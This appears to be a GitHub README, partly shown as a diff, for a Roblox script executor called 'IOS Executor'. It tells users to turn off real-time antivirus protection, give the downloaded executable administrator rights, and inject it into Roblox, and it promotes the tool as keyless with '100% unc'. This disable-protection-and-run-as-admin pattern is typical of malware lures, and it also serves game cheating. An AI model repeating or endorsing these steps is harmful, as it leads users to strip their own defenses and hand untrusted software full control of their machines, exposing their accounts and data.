Slendyvn/IOS-Executor-/README.md

 1.First turn off your real time protection to download (and also use this) 2.Open the file and right click then give "IOS Executor.exe" Adminstration 3.Open roblox -> Inject -> Enjoy!
+## Whats good about this executor?
+this executor have 100% unc and KEYLESS while other executor like atlantis (also 100% unc) need key for only 6 hours! basically it cuz it was inspired by an old executor, what did you expect?